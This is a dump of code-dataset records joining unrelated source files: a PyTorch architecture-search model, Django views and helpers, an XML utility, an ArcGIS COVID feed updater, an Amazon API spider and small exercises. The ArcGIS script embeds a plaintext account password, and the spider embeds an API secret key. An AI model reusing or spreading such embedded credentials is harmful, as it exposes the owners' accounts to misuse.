2)\n tw2 = F.softmax(self.betas_normal[start:end] / self.T, dim=-1)\n start = end\n weights_edge = torch.cat([weights_edge, tw2], dim=0)\n\n s0, s1 = s1, cell(s0, s1, weights, weights_edge)\n\n s1 = self.lastact(s1)\n out = self.global_pooling(s1)\n logits = self.classifier(out.view(out.size(0), -1))\n\n return logits\n\n def load_arch(self, state_dict):\n if 'alphas_normal_non_params' in state_dict:\n self.alphas_normal_non_params.data.copy_(state_dict[\"alphas_normal_non_params\"])\n if 'alphas_normal_params' in state_dict:\n self.alphas_normal_params.data.copy_(state_dict[\"alphas_normal_params\"])\n if 'alphas_reduce_params' in state_dict:\n self.alphas_reduce_params.data.copy_(state_dict[\"alphas_reduce_params\"])\n if 'alphas_reduce_non_params' in state_dict:\n self.alphas_reduce_non_params.data.copy_(state_dict[\"alphas_reduce_non_params\"])\n if 'alphas_normal_balance' in state_dict:\n self.alphas_normal_balance.data.copy_(state_dict[\"alphas_normal_balance\"])\n if 'alphas_reduce_balance' in state_dict:\n self.alphas_reduce_balance.data.copy_(state_dict[\"alphas_reduce_balance\"])\n if 'betas_normal' in state_dict:\n self.betas_normal.data.copy_(state_dict[\"betas_normal\"])\n if 'betas_reduce' in state_dict:\n self.betas_reduce.data.copy_(state_dict[\"betas_reduce\"])\n if 'bool_mask_normal' in state_dict:\n self.bool_mask_normal.data.copy_(state_dict[\"bool_mask_normal\"])\n if 'bool_mask_reduce' in state_dict:\n self.bool_mask_reduce.data.copy_(state_dict[\"bool_mask_reduce\"])\n\n def _loss(self, input, target):\n if 'tp' in self.phase:\n logits_onehot = self.forward_oh(input)\n return self._criterion(logits_onehot, target)\n else:\n logits = self(input)\n return self._criterion(logits, target)\n\n def _initialize_alphas(self):\n k = sum(1 for i in range(self._steps) for n in range(2 + i))\n num_ops = len(PRIMITIVES)\n\n # hardcode params [conv3*3, conv5*5, dil3*3, dil5*5] no_params [zero, maxpool, avgpool, identity]\n\n # group weight\n self.alphas_normal_non_params = Variable(1e-3 * torch.zeros(k, 4).cuda(), requires_grad=True)\n self.alphas_normal_params = Variable(1e-3 * torch.zeros(k, 4).cuda(), requires_grad=True)\n\n self.alphas_reduce_non_params = Variable(1e-3 * torch.zeros(k, 4).cuda(), requires_grad=True)\n self.alphas_reduce_params = Variable(1e-3 * torch.zeros(k, 4).cuda(), requires_grad=True)\n\n self._arch_parameters = [\n self.alphas_normal_non_params,\n self.alphas_normal_params,\n self.alphas_reduce_non_params,\n self.alphas_reduce_params\n ]\n\n def save_arch(self, path):\n if 'op' in self.phase:\n state_dict = {\n \"alphas_normal_non_params\": self.alphas_normal_non_params,\n \"alphas_normal_params\": self.alphas_normal_params,\n \"alphas_reduce_non_params\": self.alphas_reduce_non_params,\n \"alphas_reduce_params\": self.alphas_reduce_params\n }\n else:\n state_dict = {\n \"bool_mask_normal\": self.bool_mask_normal,\n \"bool_mask_reduce\": self.bool_mask_reduce,\n \"alphas_normal_balance\": self.alphas_normal_balance,\n \"alphas_reduce_balance\": self.alphas_reduce_balance,\n \"betas_normal\": self.betas_normal,\n \"betas_reduce\": self.betas_reduce,\n }\n torch.save(state_dict, path)\n\n def arch_parameters(self):\n return self._arch_parameters\n\n def genotype(self):\n\n def _parse_op(weights):\n gene = []\n n = 2\n start = 0\n for i in range(self._steps):\n end = start + n\n W = weights[start:end].copy()\n\n edges = sorted(range(i + 2),\n key=lambda x: -max(W[x][k] for k in range(len(W[x])) if k != PRIMITIVES.index('none')))[\n :2]\n\n for j in edges:\n k_best = None\n for k in range(len(W[j])):\n if k != PRIMITIVES.index('none'):\n if k_best is None or W[j][k] > W[j][k_best]:\n k_best = k\n gene.append((PRIMITIVES[k_best], j)) # geno item: (operation, node idx)\n start = end\n n += 1\n return gene\n\n def _parse_tp(weights, weights2):\n gene = []\n n = 2\n start_op = 0\n start_tp = 0\n for i in range(self._steps):\n end_op = start_op + n\n end_tp = start_tp + Cal_Combination_Numbers(2 + i, 2)\n W = weights[start_op:end_op].copy()\n W2 = weights2[start_tp:end_tp].copy()\n edges = list(combinations(list(range(2 + i)), 2))[W2.argmax()]\n\n for j in edges:\n k_best = None\n for k in range(len(W[j])):\n if k != PRIMITIVES.index('none'):\n if k_best is None or W[j][k] > W[j][k_best]:\n k_best = k\n gene.append((PRIMITIVES[k_best], j))\n start_tp = end_tp\n start_op = end_op\n n += 1\n return gene\n\n print(self.phase)\n if 'op' in self.phase:\n weights_reduce_non_params = F.softmax(self.alphas_reduce_non_params, dim=-1).cpu()\n weights_reduce_params = F.softmax(self.alphas_reduce_params, dim=-1).cpu()\n weights_reduce = torch.cat([weights_reduce_non_params, weights_reduce_params], -1)\n\n weights_normal_non_params = F.softmax(self.alphas_normal_non_params, dim=-1).cpu()\n weights_normal_params = F.softmax(self.alphas_normal_params, dim=-1).cpu()\n weights_normal = torch.cat([weights_normal_non_params, weights_normal_params], -1)\n\n gene_normal = _parse_op(weights_normal.data.cpu().numpy())\n gene_reduce = _parse_op(weights_reduce.data.cpu().numpy())\n\n else:\n start = 1\n weightsr2 = F.softmax(self.betas_reduce[0:Cal_Combination_Numbers(2, 2)], dim=-1)\n weightsn2 = F.softmax(self.betas_normal[0:Cal_Combination_Numbers(2, 2)], dim=-1)\n for i in range(1, self._steps):\n end = start + Cal_Combination_Numbers(2 + i, 2)\n tw2 = F.softmax(self.betas_reduce[start:end] / self.T, dim=-1)\n tn2 = F.softmax(self.betas_normal[start:end] / self.T, dim=-1)\n start = end\n weightsr2 = torch.cat([weightsr2, tw2], dim=0)\n weightsn2 = torch.cat([weightsn2, tn2], dim=0)\n\n weights_reduce_balance = F.softmax(self.alphas_reduce_balance, dim=-1)\n weights_reduce = torch.zeros_like(self.bool_mask_reduce)\n weights_reduce[:, :4] = self.bool_mask_reduce[:, :4] * weights_reduce_balance[:, :1]\n weights_reduce[:, 4:] = self.bool_mask_reduce[:, 4:] * weights_reduce_balance[:, 1:]\n\n weights_normal_balance = F.softmax(self.alphas_normal_balance, dim=-1)\n weights_normal = torch.zeros_like(self.bool_mask_normal)\n weights_normal[:, :4] = self.bool_mask_normal[:, :4] * weights_normal_balance[:, :1]\n weights_normal[:, 4:] = self.bool_mask_normal[:, 4:] * weights_normal_balance[:, 1:]\n\n gene_normal = _parse_tp(weights_normal.data.cpu().numpy(), weightsn2.data.cpu().numpy())\n gene_reduce = _parse_tp(weights_reduce.data.cpu().numpy(), weightsr2.data.cpu().numpy())\n\n concat = range(2 + self._steps - self._multiplier, self._steps + 2)\n genotype = Genotype(\n normal=gene_normal, normal_concat=concat,\n reduce=gene_reduce, reduce_concat=concat\n )\n return genotype, weights_normal, weights_reduce\n\n","sub_path":"pytorch/model_search_imagenet.py","file_name":"model_search_imagenet.py","file_ext":"py","file_size_in_byte":19893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"394650536","text":"#from django.conf.urls.defaults import patterns, url\nfrom django.conf.urls import patterns, url\n\nurlpatterns = patterns('upload.views',\n url(r'^$', 'upload', name='upload'),\n #url(r'^(?P\\d+)$', 'uploadAssignment', name='upload_uploadassignment'),\n url(r'^showall/(?P\\d+)$', 'showAllSubmissions', name='upload_showAllSubmissions'),\n url(r'^mysubmissions/(?P\\d+)$', 'my_submissions', name='upload_mysubmissions'),\n url(r'^submission/download/(?P\\d+)$', 'submissionDownload', name='submission_downloadfile'),\n)\n","sub_path":"upload/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"151612408","text":"\"\"\"ElementTree Utilities package for NDG SOAP Package\n\nNERC DataGrid Project\n\"\"\"\n__author__ = \"P J Kershaw\"\n__date__ = \"02/04/09\"\n__copyright__ = \"(C) 2010 Science and Technology Facilities Council\"\n__license__ = \"http://www.apache.org/licenses/LICENSE-2.0\"\n__contact__ = \"Philip.Kershaw@stfc.ac.uk\"\n__revision__ = '$Id$'\ntry: # python 2.5\n from xml.etree import ElementTree\nexcept ImportError:\n # if you've installed it yourself it comes this way\n import ElementTree\n\nimport re\n\n\nclass QName(ElementTree.QName):\n \"\"\"XML Qualified Name for ElementTree\n \n Extends ElementTree implementation for improved attribute access support\n \"\"\" \n # ElementTree tag is of the form {namespace}localPart. getNs extracts the\n # namespace from within the brackets but if not found returns ''\n getNs = staticmethod(lambda tag: getattr(re.search('(?<=\\{).+(?=\\})', tag),\n 'group', \n str)())\n \n getLocalPart = staticmethod(lambda tag: tag.rsplit('}', 1)[-1])\n \n def __init__(self, namespaceURI, tag=None, prefix=None):\n \"\"\"Initialise a qualified name\n \n @param namespaceURI: element namespace URI\n @type namespaceURI: basestring\n @param tag: element local name\n @type tag: basestring\n @param prefix: XML namespace prefix\n @type prefix: basestring\n \"\"\"\n ElementTree.QName.__init__(self, namespaceURI, tag=tag)\n \n if tag:\n self.namespaceURI = namespaceURI\n self.localPart = tag\n else:\n self.namespaceURI = QName.getNs(namespaceURI)\n self.localPart = QName.getLocalPart(namespaceURI)\n \n self.prefix = prefix\n\n def __eq__(self, qname):\n \"\"\"Enable equality check for QName\n @type qname: ndg.security.common.utils.etree.QName\n @param qname: Qualified Name to compare with self \n @return: True if names are equal\n @rtype: bool\n \"\"\"\n if not isinstance(qname, QName):\n raise TypeError('Expecting %r; got %r' % (QName, type(qname)))\n \n return (self.prefix, self.namespaceURI, self.localPart) == \\\n (qname.prefix, qname.namespaceURI, qname.localPart)\n\n def __ne__(self, qname):\n \"\"\"Enable equality check for QName\n @type qname: ndg.security.common.utils.etree.QName\n @param qname: Qualified Name to compare with self \n @return: True if names are not equal\n @rtype: bool\n \"\"\"\n return not self.__eq__(qname)\n \n def _getPrefix(self):\n return self.__prefix\n\n def _setPrefix(self, value):\n self.__prefix = value\n \n prefix = property(_getPrefix, _setPrefix, None, \"Prefix\")\n\n def _getLocalPart(self):\n return self.__localPart\n \n def _setLocalPart(self, value):\n self.__localPart = value\n \n localPart = property(_getLocalPart, _setLocalPart, None, \"LocalPart\")\n\n def _getNamespaceURI(self):\n return self.__namespaceURI\n\n def _setNamespaceURI(self, value):\n self.__namespaceURI = value\n \n namespaceURI = property(_getNamespaceURI, _setNamespaceURI, None, \n \"Namespace URI'\")\n\n\ndef prettyPrint(*arg, **kw):\n '''Lightweight pretty printing of ElementTree elements'''\n \n # Keep track of namespace declarations made so they're not repeated\n declaredNss = []\n \n _prettyPrint = _PrettyPrint(declaredNss)\n return _prettyPrint(*arg, **kw)\n\n\nclass _PrettyPrint(object):\n def __init__(self, declaredNss):\n self.declaredNss = declaredNss\n \n @staticmethod\n def estrip(elem):\n ''' Just want to get rid of unwanted whitespace '''\n if elem is None:\n return ''\n else:\n # just in case the elem is another simple type - e.g. int - \n # wrapper it as a string\n return str(elem).strip()\n \n def __call__(self, elem, indent='', html=0, space=' '*4):\n '''Most of the work done in this wrapped function - wrapped so that\n state can be maintained for declared namespace declarations during\n recursive calls using \"declaredNss\" above''' \n strAttribs = []\n for attr, attrVal in elem.attrib.items():\n nsDeclaration = ''\n \n attrNamespace = QName.getNs(attr)\n if attrNamespace:\n nsPrefix = ElementTree._namespace_map.get(attrNamespace)\n if nsPrefix is None:\n raise KeyError('prettyPrint: missing namespace \"%s\" for ' \n 'ElementTree._namespace_map'%attrNamespace)\n \n attr = \"%s:%s\" % (nsPrefix, QName.getLocalPart(attr))\n \n if attrNamespace not in self.declaredNss:\n nsDeclaration = ' xmlns:%s=\"%s\"' % (nsPrefix,attrNamespace)\n self.declaredNss.append(attrNamespace)\n \n strAttribs.append('%s %s=\"%s\"' % (nsDeclaration, attr, attrVal))\n \n strAttrib = ''.join(strAttribs)\n \n namespace = QName.getNs(elem.tag)\n nsPrefix = ElementTree._namespace_map.get(namespace)\n if nsPrefix is None:\n raise KeyError('prettyPrint: missing namespace \"%s\" for ' \n 'ElementTree._namespace_map' % namespace)\n \n tag = \"%s:%s\" % (nsPrefix, QName.getLocalPart(elem.tag))\n \n # Put in namespace declaration if one doesn't already exist\n # FIXME: namespace declaration handling is wrong for handling child\n # element scope\n if namespace in self.declaredNss:\n nsDeclaration = ''\n else:\n nsDeclaration = ' xmlns:%s=\"%s\"' % (nsPrefix, namespace)\n self.declaredNss.append(namespace)\n \n result = '%s<%s%s%s>%s' % (indent, tag, nsDeclaration, strAttrib, \n _PrettyPrint.estrip(elem.text))\n \n children = len(elem)\n if children:\n for child in elem:\n declaredNss = self.declaredNss[:]\n _prettyPrint = _PrettyPrint(declaredNss)\n result += '\\n'+ _prettyPrint(child, indent=indent+space) \n \n result += '\\n%s%s' % (indent,\n _PrettyPrint.estrip(child.tail),\n tag)\n else:\n result += '' % tag\n \n return result\n\n","sub_path":"ndg_soap/ndg/soap/utils/etree.py","file_name":"etree.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"334921430","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport os\nimport numpy as np\nimport click\nfrom mmdcritic import MMDCritic\nfrom mmdcritic import write_outputfile\n\n\n@click.command('cli')\n@click.argument('xpath', type=click.Path(exists=True))\n@click.argument('gamma', default=0.024, type=float)\n@click.argument('m', default=10, type=int)\n@click.option('--kernel', type=click.Path(exists=True), default=None)\ndef main(xpath, gamma, m, kernel):\n print('*** starting mmdcritic ***')\n if kernel is not None:\n mmd_critic = MMDCritic.from_file(xpath, gamma, kernelpath=kernel)\n else:\n mmd_critic = MMDCritic.from_file(xpath, gamma)\n print(' *** getting prototypes ***')\n prototypes = mmd_critic.select_prototypes(m)\n print(' *** getting critics ***')\n critics = mmd_critic.select_criticism(m)\n write_outputfile(prototypes, 'prototypes')\n write_outputfile(critics, 'critics')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run/getprotocritics.py","file_name":"getprotocritics.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"265310818","text":"maandnummer = eval(input('Geef een maandnummer: '))\n\ndef seizoen(month):\n if month > 0 and month < 3 or month > 8 and month < 13:\n print('Winter')\n elif month > 2 and month < 6:\n print('Lente')\n elif month > 5 and month < 9:\n print('Herft')\n else:\n print('Geef een correct maandnummer!')\n\nseizoen(maandnummer)","sub_path":"les8/pe8_1.py","file_name":"pe8_1.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"173914578","text":"from typing import Iterable\n\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.template.response import TemplateResponse\n\n\ndef search(request, db_model_class, request_param_name, db_field_name, params_dic):\n if request_param_name.startswith('checkbox'):\n if request_param_name in request.POST and request.POST[request_param_name]:\n params_dic[request_param_name] = request.POST[request_param_name]\n value = True if request.POST[request_param_name] == 'on' else False\n return db_model_class.filter(**{db_field_name: value})\n elif request_param_name in request.GET and request.GET[request_param_name]:\n params_dic[request_param_name] = request.GET[request_param_name]\n value = True if request.GET[request_param_name] == 'on' else False\n return db_model_class.filter(**{db_field_name: value})\n else:\n return db_model_class\n else:\n if request_param_name in request.POST and request.POST[request_param_name]:\n params_dic[request_param_name] = request.POST[request_param_name]\n return db_model_class.filter(**{db_field_name: request.POST[request_param_name]})\n elif request_param_name in request.GET and request.GET[request_param_name]:\n params_dic[request_param_name] = request.GET[request_param_name]\n return db_model_class.filter(**{db_field_name: request.GET[request_param_name]})\n else:\n return db_model_class\n\n\ndef paginate(request, objects):\n page = request.GET.get('page', 1)\n per_page = request.POST.get('per_page', None)\n if not per_page:\n per_page = request.GET.get('per_page', '10')\n\n if per_page.isdigit():\n per_page = int(per_page)\n else:\n per_page = 10\n paginator = Paginator(objects, per_page)\n try:\n pager = paginator.page(page)\n except PageNotAnInteger:\n pager = paginator.page(1)\n except EmptyPage:\n pager = paginator.page(paginator.num_pages)\n return pager, pager.number, pager.paginator.per_page\n\n\ndef complex_search(request, db_model_class, **search_params):\n params_dic = {}\n for request_field_name, db_field_name in search_params.items():\n db_model_class = search(request, db_model_class, request_field_name, db_field_name, params_dic)\n return db_model_class, params_dic\n\n\ndef form_context(request, db_model_class, **kwargs):\n if 'result_field_name' in kwargs:\n result_field_name = kwargs['result_field_name']\n del kwargs['result_field_name']\n else:\n result_field_name = 'db_objects'\n\n if 'search_attributes' in kwargs:\n search_attributes = kwargs['search_attributes']\n del kwargs['search_attributes']\n else:\n search_attributes = {}\n\n if 'additional_fields' in kwargs:\n additional_fields = kwargs['additional_fields']\n del kwargs['additional_fields']\n else:\n additional_fields = {}\n\n context_data = kwargs\n search_object, params_dic = complex_search(request, db_model_class, **search_attributes)\n objects, page, per_page = paginate(request, search_object)\n context_data[result_field_name] = objects.object_list\n context_data['page'] = objects\n context_data['page_count'] = per_page\n if additional_fields:\n params_dic.update(additional_fields)\n context_data.update(additional_fields)\n context_data['params'] = params_dic\n return context_data\n\n\ndef request_paginator_form(request, template_name, db_model_class, **kwargs):\n context_data = form_context(request, db_model_class, **kwargs)\n return TemplateResponse(request, template_name, context=context_data)\n\n\ndef get_attribute_from_context(context, attribute_path, need_clean=True):\n d = {}\n if context:\n attributes = attribute_path.split('.')\n for attr in attributes:\n if context:\n if hasattr(context, attr):\n d = getattr(context, attr, {})\n elif attr in context:\n d = context[attr]\n else:\n d = None\n break\n context = d\n else:\n d = {}\n break\n if need_clean:\n d = create_clean_copy(d)\n return d\n\n\ndef create_clean_copy(iterable_element):\n if type(iterable_element) == str:\n d = iterable_element\n elif isinstance(iterable_element, dict):\n d = {k: v for k, v in iterable_element.items()}\n elif isinstance(iterable_element, set):\n d = {k for k in iterable_element}\n elif isinstance(iterable_element, Iterable):\n d = [k for k in iterable_element]\n else:\n d = iterable_element\n\n return d\n\n\ndef get_request_param(request, name, default=None, types=['GET', 'POST'], empty_as_default=True):\n result = default\n for type_ in types:\n if hasattr(request, type_):\n object_ = getattr(request, type_)\n if name in object_:\n result = object_[name]\n if not result and empty_as_default:\n result = default\n break\n return result\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"17212748","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.home, name='blog-home'),\n path('about/', views.about, name= 'blog-about'),\n path('contact/', views.contact, name='blog-contact'),\n #path('user/register', views.register, name='user-register')\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"612929177","text":"names = ['Jeff', 'Gary', 'Jill', 'Samantha']\n\n# for name in names:\n# print('Hello there {0}!'.format(name))\n\n# print(', '.join(names))\n\nwho = 'Gary'\nhow_many = 12\n\n# Gary bought 12 apples today\nprint('{} bought {} apples today!'.format(who,how_many))\n\n","sub_path":"intermediate/stringTut.py","file_name":"stringTut.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"306445438","text":"import sys, os, tempfile, json, logging, arcpy, fnmatch, shutil, subprocess, arcgis\nfrom arcgis.gis import GIS\nimport datetime as dt\nfrom urllib import request\nfrom urllib.error import URLError\nimport pandas as pd\n\ndef feedRoutine (url, workGDB, itemid, original_sd_file, service_name):\n # Log file\n logging.basicConfig(filename=\"update_covid_data.log\", level=logging.INFO)\n log_format = \"%Y-%m-%d %H:%M:%S\"\n # Create workGDB and default workspace\n print(\"Starting workGDB...\")\n logging.info(\"Starting workGDB... {0}\".format(dt.datetime.now().strftime(log_format)))\n arcpy.env.workspace = workGDB\n if arcpy.Exists(arcpy.env.workspace):\n for feat in arcpy.ListFeatureClasses (\"ZIP\"): \n arcpy.management.Delete(feat)\n else:\n arcpy.management.CreateFileGDB(os.path.dirname(workGDB), os.path.basename(workGDB))\n \n # Download and split json file\n print(\"Downloading data...\")\n logging.info(\"Downloading data... {0}\".format(dt.datetime.now().strftime(log_format)))\n temp_dir = tempfile.mkdtemp()\n # convert to JSON from csv --> need to write if statement for future \n df = pd.read_csv (r'covid_data.csv')\n df.to_json(r'covid-data.json')\n # commenting out below bc don't need to fetch from url\n filename = os.path.join(temp_dir, 'latest_data.json')\n # try:\n # response = request.urlretrieve(url, filename)\n # except URLError:\n # logging.exception(\"Failed on: request.urlretrieve(url, filename) {0}\".format(dt.datetime.now().strftime(log_format)))\n # raise Exception(\"{0} not available. Check internet connection or url address\".format(url))\n with open(filename) as json_file:\n data_raw = json.load(json_file)\n data_stations = dict(type=data_raw['type'], features=[])\n data_areas = dict(type=data_raw['type'], features=[])\n for feat in data_raw['features']:\n if feat['geometry']['type'] == 'Point':\n data_stations['features'].append(feat)\n else:\n data_areas['features'].append(feat)\n # Filenames of temp json files\n stations_json_path = os.path.join(temp_dir, 'points.json')\n areas_json_path = os.path.join(temp_dir, 'polygons.json')\n # Save dictionaries into json files\n with open(stations_json_path, 'w') as point_json_file:\n json.dump(data_stations, point_json_file, indent=4)\n with open(areas_json_path, 'w') as poly_json_file:\n json.dump(data_areas, poly_json_file, indent=4)\n # Convert json files to features\n print(\"Creating feature classes...\")\n logging.info(\"Creating feature classes... {0}\".format(dt.datetime.now().strftime(log_format)))\n arcpy.conversion.JSONToFeatures(stations_json_path, 'alert_stations') \n arcpy.conversion.JSONToFeatures(areas_json_path, 'alert_areas')\n # Add 'alert_level ' field\n arcpy.management.AddField('alert_stations', 'alert_level', 'SHORT', field_alias='Alert Level')\n arcpy.management.AddField('alert_areas', 'alert_level', 'SHORT', field_alias='Alert Level')\n # Calculate 'alert_level ' field\n arcpy.management.CalculateField('alert_stations', 'alert_level', \"int(!alert!)\")\n arcpy.management.CalculateField('alert_areas', 'alert_level', \"int(!alert!)\")\n\n # Deployment Logic\n print(\"Deploying...\")\n logging.info(\"Deploying... {0}\".format(dt.datetime.now().strftime(log_format)))\n deployLogic(workGDB, itemid, original_sd_file, service_name)\n\n # Close Log File\n logging.shutdown()\n\n # Return\n print(\"Done!\")\n logging.info(\"Done! {0}\".format(dt.datetime.now().strftime(log_format)))\n return True\n\ndef deployLogic(workGDB, itemid, original_sd_file, service_name):\n # Get item from ArcGIS Online\n gis = GIS(url='https://arcgis.com', username='tola_TerrEmpathy', password='ibitola95')\n item = gis.content.get(itemid)\n sd_file_name = os.path.basename(original_sd_file)\n # if sd_file_name != item.related_items(\"Service2Data\")[0].name:\n # raise Exception('Erroneous itemid, service name, or original sd file'.format(itemid))\n # Unpack original_sd_file using 7-zip\n path_7z = fnmatch.filter(os.environ['path'].split(';'), '*7-Zip')\n # path_7z = [r'C:\\Program Files\\7-Zip\\7z.exe', ...]\n temp_dir = tempfile.mkdtemp()\n if len(path_7z):\n exe_7z = os.path.join(path_7z[0], '7z.exe')\n call_unzip = '{0} x {1} -o{2}'.format(exe_7z, original_sd_file, temp_dir)\n else:\n raise Exception('7-Zip could not be found in the PATH environment variable')\n subprocess.call(call_unzip)\n # Replace Live.gdb content\n liveGDB = os.path.join(temp_dir, 'p20', 'test-live-data.gdb')\n shutil.rmtree(liveGDB)\n os.mkdir(liveGDB)\n for root, dirs, files in os.walk(workGDB):\n files = [f for f in files if '.lock' not in f]\n for f in files:\n shutil.copy2(os.path.join(workGDB, f), os.path.join(liveGDB, f))\n # Zip file\n os.chdir(temp_dir)\n updated_sd = os.path.join(temp_dir, sd_file_name)\n call_zip = '{0} a {1} -m1=LZMA'.format(exe_7z, updated_sd)\n subprocess.call(call_zip)\n # Replace file\n manager = arcgis.features.FeatureLayerCollection.fromitem(item).manager\n status = manager.overwrite(updated_sd)\n # Return\n return True\n\nif __name__ == \"__main__\":\n [url, workGDB, itemid, original_sd_file, service_name] = sys.argv[1:]\n feedRoutine (url, workGDB, itemid, original_sd_file, service_name)","sub_path":"update_covid_data.py","file_name":"update_covid_data.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"260860844","text":"from alascrapy.spiders.base_spiders.amazon_API_spider import AmazonAPISpider\n\n\nclass AmazonComAPISpider(AmazonAPISpider):\n source_key = 'com'\n name = 'amazon_api_com'\n start_urls = ['https://www.amazon.com']\n endpoint = 'webservices.amazon.com'\n associate_tag = 'alatestcouk0e-21'\n subscription_id = '0EWA6R5AGNW9AA6JF8R2'\n secret_key = '1RFwtwfJeqi6fTzO/hxmf+J9E8Nfai2rHWSwy6xu'","sub_path":"alascrapy/spiders/amazon_API_com.py","file_name":"amazon_API_com.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49243313","text":"#!/usr/bin/env python3\nfrom hashlib import md5\nimport sys\n\ndef get_md5(s):\n m = md5()\n m.update(s.encode('utf-8'))\n return m.hexdigest()\n\n\nTEST_FUNCTION = sys.argv[1]\n\n\nFundamentalTypes = [\n # -- bool -- #\n #'bool',\n\n # -- char -- #\n 'char',\n 'unsigned char',\n\n # -- int -- #\n 'short',\n 'short int',\n 'signed short',\n 'signed short int',\n 'unsigned short',\n 'unsigned short int',\n 'int',\n 'signed',\n 'signed int',\n 'unsigned',\n 'unsigned int',\n 'long',\n 'long int',\n 'signed long',\n 'signed long int',\n 'unsigned long',\n 'unsigned long int',\n 'long long',\n 'long long int',\n 'signed long long',\n 'signed long long int',\n 'unsigned long long',\n 'unsigned long long int',\n 'int8_t',\n 'int16_t',\n 'int32_t',\n 'int64_t',\n 'int_fast8_t',\n 'int_fast16_t',\n 'int_fast32_t',\n 'int_fast64_t',\n 'int_least8_t',\n 'int_least16_t',\n 'int_least32_t',\n 'int_least64_t',\n 'uint8_t',\n 'uint16_t',\n 'uint32_t',\n 'uint64_t',\n 'uint_fast8_t',\n 'uint_fast16_t',\n 'uint_fast32_t',\n 'uint_fast64_t',\n 'uint_least8_t',\n 'uint_least16_t',\n 'uint_least32_t',\n 'uint_least64_t',\n 'size_t',\n\n # -- float/double -- #\n 'float',\n 'double',\n 'long double',\n]\n\nOtherTypes = [\n 'string',\n]\n\nContainerTypes = [\n # -- basic -- #\n 'complex',\n\n # -- sequence -- #\n 'forward_list',\n 'list',\n 'deque',\n #'array',\n 'vector',\n\n # -- associative -- #\n #'set',\n #'map',\n #'unordered_set',\n #'unordered_map',\n]\n\n\nOPENMODE = 'ios::out'\n\nprint(\"\"\"\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \"ioer.hpp\"\n\nusing namespace std;\nusing namespace ioer;\n\nint main(int argc, char** argv){\n\toutput_t STDOUT;\n\toutput_t F1(\"1.txt\", %s);\n\toutput_t F2(\"2.txt\", %s);\n\"\"\"[1:] % (OPENMODE, OPENMODE))\n\nPRINTLIST = []\n\nfor T in FundamentalTypes:\n NAME='_' + get_md5(T)\n code = '\\t{TYPE} {NAME} = {VALUE};'.format(TYPE=T,\n NAME=NAME,\n VALUE='numeric_limits<' + T + '>::max()')\n PRINTLIST.append(NAME)\n print(code)\n\nfor T in OtherTypes:\n NAME='_' + get_md5(T)\n code = '\\t{TYPE} {NAME} = {VALUE};'.format(TYPE=T,\n NAME='_' + get_md5(T),\n VALUE='\"' + T + '\"')\n PRINTLIST.append(NAME)\n print(code)\n\nfor C in ContainerTypes:\n if C == 'array':\n OTHERS = \", 3\"\n else:\n OTHERS = \"\"\n\n if C == 'complex':\n for T in FundamentalTypes:\n if T != 'char' or T != 'unsigned char':\n NAME='_' + get_md5(C+T)\n code = '\\t{CONTAINER}<{TYPE}{OTHERS}> {NAME} = '.format( CONTAINER=C,\n TYPE=T,\n NAME=NAME,\n OTHERS=OTHERS)\n code += '('\n code += '{MIN}, {MAX}' \\\n .format(\n MIN='numeric_limits<{T}>::min()'.format(T=T),\n MAX='numeric_limits<{T}>::max()'.format(T=T),\n )\n code += ');'\n PRINTLIST.append(NAME)\n print(code)\n continue\n for T in FundamentalTypes:\n NAME='_' + get_md5(C+T)\n code = '\\t{CONTAINER}<{TYPE}{OTHERS}> {NAME} = '.format( CONTAINER=C,\n TYPE=T,\n NAME=NAME,\n OTHERS=OTHERS)\n code += '{'\n code += '{MIN}, {MAX}, {MID}' \\\n .format(\n MIN='numeric_limits<{T}>::min()'.format(T=T),\n MAX='numeric_limits<{T}>::max()'.format(T=T),\n MID='(numeric_limits<{T}>::max() + numeric_limits<{T}>::min() ) / 2'.format(T=T),\n )\n code += '};'\n PRINTLIST.append(NAME)\n print(code)\n\n for T in OtherTypes:\n NAME='_' + get_md5(C+T)\n code = '\\t{CONTAINER}<{TYPE}{OTHERS}> {NAME} = '.format( CONTAINER=C,\n TYPE=T,\n NAME=NAME,\n OTHERS=OTHERS)\n code += '{'\n code += '{MIN}, {MAX}, {MID}' \\\n .format(\n MIN='\"numeric_limits<{T}>::min()\"'.format(T=T),\n MAX='\"numeric_limits<{T}>::max()\"'.format(T=T),\n MID='\"(numeric_limits<{T}>::max() + numeric_limits<{T}>::min() ) / 2\"'.format(T=T),\n )\n code += '};'\n PRINTLIST.append(NAME)\n print(code)\n\nprint(\"\"\"\n // {TEST_FUNCTION}\n STDOUT.{TEST_FUNCTION}(\n {PRINTLIST}\n );\n F1.{TEST_FUNCTION}(\n {PRINTLIST}\n );\n F2.{TEST_FUNCTION}(\n {PRINTLIST}\n );\n\"\"\".format(TEST_FUNCTION=TEST_FUNCTION,\n PRINTLIST=',\\n\\t'.join(PRINTLIST) + 